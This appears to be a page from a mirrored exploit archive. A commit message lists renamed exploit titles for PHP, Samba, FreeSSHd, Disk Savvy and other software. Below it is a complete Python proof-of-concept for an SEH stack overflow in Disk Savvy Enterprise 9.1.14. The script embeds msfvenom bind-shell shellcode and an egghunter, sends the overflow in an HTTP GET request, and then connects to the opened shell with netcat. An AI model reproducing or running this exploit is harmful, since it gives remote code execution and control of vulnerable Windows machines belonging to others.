4b3da08aa9
1 new exploits PHP - wddx_deserialize() String Append Crash PHP 5 - wddx_deserialize() String Append Crash PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC) PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC) Samba 3.0.27a - send_mailslot() Remote Buffer Overflow Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow PHP 5.2.6 - sleep() Local Memory Exhaust Exploit CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC) PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC) freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated Samba (client) - receive_smb_raw() Buffer Overflow (PoC) FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC) freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC) FreeSSHD 1.2.4 - Remote Buffer Overflow Denial of Service FreeSSHd 1.2.4 - Denial of Service Samba - Multiple Denial of Service Vulnerabilities Samba 3.4.7/3.5.1 - Denial of Service FreeSSHd - Crash (PoC) FreeSSHd - Denial of Service (PoC) PHP - Hashtables Denial of Service PHP 5.3.8 - Hashtables Denial of Service freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service freeSSHd 1.3.1 - Denial of Service FreeSSHd 1.3.1 - Denial of Service PHP - SplDoublyLinkedList Unserialize() Use-After-Free PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free PHP - SplObjectStorage Unserialize() Use-After-Free PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free PHP - Unserialize() Use-After-Free Vulnerabilities PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities PHP - 'ini_restore()' Memory Information Disclosure PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation Linux Kernel 3.13 - Privilege Escalation PoC (gid) Linux Kernel 3.13 - Privilege Escalation PoC (SGID) freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow freeSSHd 1.2.1 - Authenticated Remote SEH Overflow FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH) FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH) Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit) Samba (Solaris SPARC) - trans2open Overflow (Metasploit) Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit) freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit) Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit) Samba (Linux x86) - trans2open Overflow (Metasploit) Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit) Samba (OSX/PPC) - trans2open Overflow (Metasploit) Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit) Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit) Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit) PHP - CGI Argument Injection (Metasploit) PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit) PHP - apache_request_headers Function Buffer Overflow (Metasploit) PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit) Samba - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) FreeSSHD 2.1.3 - Remote Authentication Bypass FreeSSHd 2.1.3 - Remote Authentication Bypass FreeSSHD - Authentication Bypass (Metasploit) FreeSSHd 1.2.6 - Authentication Bypass (Metasploit) HP LoadRunner - magentproc.exe Overflow (Metasploit) HP LoadRunner - 'magentproc.exe' Overflow (Metasploit) PHP - 'header()' HTTP Header Injection PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection VX Search Enterprise 9.0.26 - Buffer Overflow Sync Breeze Enterprise 8.9.24 - Buffer Overflow Dup Scout Enterprise 9.0.28 - Buffer Overflow Disk Sorter Enterprise 9.0.24 - Buffer Overflow Disk Savvy Enterprise 9.0.32 - Buffer Overflow VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow Sync Breeze Enterprise 8.9.24 - 'Login' Buffer Overflow Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow VX Search Enterprise 9.1.12 - Buffer Overflow Sync Breeze Enterprise 9.1.16 - Buffer Overflow Disk Sorter Enterprise 9.1.12 - Buffer Overflow Dup Scout Enterprise 9.1.14 - Buffer Overflow Disk Savvy Enterprise 9.1.14 - Buffer Overflow Disk Pulse Enterprise 9.1.16 - Buffer Overflow VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow Sync Breeze Enterprise 9.1.16 - 'Login' Buffer Overflow Disk Sorter Enterprise 9.1.12 - 'Login' Buffer Overflow Dup Scout Enterprise 9.1.14 - 'Login' Buffer Overflow Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow PHP - (php-exec-dir) Patch Command Access Restriction Bypass PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass phNNTP 1.3 - (article-raw.php) Remote File Inclusion phNNTP 1.3 - 'article-raw.php' Remote File Inclusion Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion BP Blog 7.0 - (default.asp layout) SQL Injection BP Blog 7.0 - 'layout' Parameter SQL Injection Joomla! Component Artist (idgalery) - SQL Injection FlashBlog - (articulo_id) SQL Injection Joomla! Component Artist - 'idgalery' Parameter SQL Injection FlashBlog - 'articulo_id' Parameter SQL Injection AirvaeCommerce 3.0 - 'pid' SQL Injection AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection CMS from Scratch 1.1.3 - (image.php) Directory Traversal CMS from Scratch 1.1.3 - 'image.php' Directory Traversal HiveMaker Professional 1.0.2 - 'cid' SQL Injection HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection Social Site Generator - (sgc_id) SQL Injection Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection PHP Visit Counter 0.4 - (datespan) SQL Injection PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion BP Blog 6.0 - 'id' Blind SQL Injection EasyWay CMS - 'index.php mid' SQL Injection Social Site Generator - (path) Remote File Inclusion Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion BP Blog 6.0 - 'id' Parameter Blind SQL Injection EasyWay CMS - 'mid' Parameter SQL Injection Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection HiveMaker Directory - 'index.php cid' SQL Injection HiveMaker Directory - 'cid' Parameter SQL Injection Goople 1.8.2 - (FrontPage.php) Blind SQL Injection Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection PsychoStats 2.x - Login Parameter Cross-Site Scripting PsychoStats 2.3 - Server.php Full Path Disclosure PsychoStats 2.3 - 'Server.php' Full Path Disclosure PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities PHP - cgimode fpm writeprocmemfile Bypass disable function demo PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function CMSimple - /2author/index.php color Parameter Remote Code Execution CMSimple 4.4.4 - 'color' Parameter Remote Code Execution
76 lines
3.2 KiB
Python
Executable file
76 lines
3.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
import socket,os,time
|
|
|
|
#SEH Stack Overflow in GET request
|
|
#Disk Savvy Enterprise 9.1.14
|
|
#Tested on Windows XP SP3 && Windows 7 Professional
|
|
|
|
host = "192.168.1.20"
|
|
port = 80
|
|
|
|
#badchars \x00\x09\x0a\x0d\x20
|
|
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
|
|
buf = ""
|
|
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
|
|
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
|
|
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
|
|
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
|
|
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
|
|
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
|
|
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
|
|
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
|
|
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
|
|
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
|
|
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
|
|
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
|
|
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
|
|
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
|
|
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
|
|
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
|
|
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
|
|
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
|
|
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
|
|
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
|
|
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
|
|
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
|
|
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
|
|
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
|
|
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
|
|
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
|
|
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
|
|
buf += "\xc4\x25\x3d\xe9"
|
|
|
|
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"+
|
|
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77"+
|
|
"\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"+
|
|
"\xff\xe7")
|
|
|
|
seh = "\xc0\x42\x11\x10" #pop pop ret [libspp.dll]
|
|
nseh = "\xeb\x06\x90\x90" #jmp short +0x8
|
|
|
|
egg = "w00tw00t"
|
|
offset = 551
|
|
buffer_size = 5000
|
|
|
|
crash = "\x41"*10 + egg + "\x90"*2
|
|
crash += buf + "\x90"*(offset-20-len(buf))
|
|
crash += nseh + seh + "\x90"*8
|
|
crash += egghunter + "\x44"*(buffer_size-offset-16-len(egghunter))
|
|
|
|
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
|
|
request += "Host: " + host + "\r\n"
|
|
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
|
|
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
|
|
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
|
|
request += "Accept-Encoding: gzip, deflate" + "\r\n"
|
|
request += "Connection: keep-alive" + "\r\n\r\n"
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host,port))
|
|
s.send(request)
|
|
|
|
s.close()
|
|
|
|
print "Waiting for shell..."
|
|
time.sleep(5)
|
|
os.system("nc " + host + " 4444")
|